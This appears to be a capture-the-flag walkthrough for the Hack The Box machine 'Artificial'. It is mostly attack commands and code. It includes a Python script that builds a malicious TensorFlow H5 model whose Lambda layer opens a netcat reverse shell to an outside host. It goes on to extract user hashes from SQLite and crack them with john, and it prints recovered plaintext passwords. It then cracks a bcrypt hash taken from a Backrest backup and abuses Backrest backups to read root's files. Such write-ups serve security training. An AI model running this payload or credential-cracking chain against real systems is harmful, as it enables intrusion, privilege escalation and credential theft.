30-06-25, 10:25 PM
TARGET : ARTIFICIAL.HTB
tensorflow lambda rce : https://splint.gitbook.io/cyberblog/secu...ious-model
Webapp allows uploading TensorFlow H5 models and executes Lambda layer code during inference
Exploit.py
to run exploit.py you must be in the docker environment (or have the right environment)
execution
db creds extraction
SQLite3
Extracted hashes
Crack with john
Results:
Port discovery
Port 9898 on 127.0.0.1 LISTEN
Port forwarding
Backrest recon
you need to connect and the creds already found don't work. On the server search you'll find a backup backrest
config.json
Bcrypt hash crack with john
Password:
Root privesc with backrest
Backrest access
You'll need to create a repo before you can create a plan
Backup plan creation with root.txt
Get the root.txt
Code:
IP: 10.10.11.74
Hostname: artificial.htb
Ports: 80, 22tensorflow lambda rce : https://splint.gitbook.io/cyberblog/secu...ious-model
Webapp allows uploading TensorFlow H5 models and executes Lambda layer code during inference
Exploit.py
Code:
import tensorflow as tf
def exploit(x):
import os
os.system("rm -f /tmp/f;mknod /tmp/f p;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.10.10 1337 >/tmp/f")
return x
model = tf.keras.Sequential()
model.add(tf.keras.layers.Input(shape=(64,)))
model.add(tf.keras.layers.Lambda(exploit))
model.compile()
model.save("exploit.h5")to run exploit.py you must be in the docker environment (or have the right environment)
Code:
docker run -it --rm \
-v "$PWD":/workspace \
-w /workspace \
tensorflow/tensorflow:2.13.0
python3 exploit.pyexecution
Code:
# Listener
nc -lvnp 1337
# Upload exploit.h5 via web interface
# Click "Show Prediction" to trigger payload
# Shell as uid-100 (app group)db creds extraction
SQLite3
Code:
find . -name "*.db" 2>/dev/null
sqlite3 users.db
- .tables
- "SELECT * FROM user;"Extracted hashes
Code:
gael:c99175974b6e192936d97224638a34f8
mark:0f3d8c76530022670f1c6029eed09ccb
robert:b606c5f5136170f15444251665638b36
royer:bc25b1f80f544c0ab451c02a3dca9fc6
mary:bf041041e57f1aff3be7ea1abd6129d0Crack with john
Code:
john --wordlist=/usr/share/wordlists/rockyou.txt --format=raw-md5 hashes.txtResults:
- Code:
gael:mattp005numbertwo - Code:
royer:marwinnarak043414036
Code:
ssh gael@artificial.htb
# password: mattp005numbertwo
cat user.txtPort discovery
Code:
netstat -tlnp | grep 127.0.0.1Port 9898 on 127.0.0.1 LISTEN
Port forwarding
Code:
ssh -L 9898:127.0.0.1:9898 gael@artificial.htbBackrest recon
you need to connect and the creds already found don't work. On the server search you'll find a backup backrest
Code:
find / -type f -name "*backup*" 2>/dev/null
/var/backups/backrest_backup.tar.gz
# dowload backrest_backup.tar.gz and extract
├── backrest
├── .config
│ └── backrest
│ └── config.json
├── install.sh
├── jwt-secret
├── oplog.sqlite
├── oplog.sqlite.lock
├── oplog.sqlite-shm
├── oplog.sqlite-wal
├── processlogs
│ └── backrest.log
├── restic
└── tasklogs
├── .inprogress
├── logs.sqlite
├── logs.sqlite-shm
└── logs.sqlite-wal
cat config.jsonconfig.json
Code:
{
"auth": {
"users": [
{
"name": "backrest_root",
"passwordBcrypt": "JDJhJDEwJGNWR0l5OVZNWFFkMGdNNWdpbkNtamVpMmtaUi9BQ01Na1Nzc3BiUnV0WVA1OEVCWnovMFFP"
}
]
}
}Bcrypt hash crack with john
Code:
echo 'JDJhJDEwJGNWR0l5OVZNWFFkMGdNNWdpbkNtamVpMmtaUi9BQ01Na1Nzc3BiUnV0WVA1OEVCWnovMFFP' | base64 -d > hash.bcrypt
john --wordlist=/usr/share/wordlists/rockyou.txt --format=bcrypt hash.bcryptPassword:
Code:
backrest_root:!@#$%^Root privesc with backrest
Backrest access
Code:
url: http://localhost:9898
Creds: backrest_root / !@#$%^You'll need to create a repo before you can create a plan
Code:
Name: test
Type: Local
Path: /tmpBackup plan creation with root.txt
Code:
Name: exploit
Repository: test
Paths: /root/- Execute backup via "Backup Now"
- Wait for green status
- Click completed backup → "Snapshot Browser"
- Navigate to /root/root.txt in snapshot browser
- Restore to /etc/root
- Download restored file
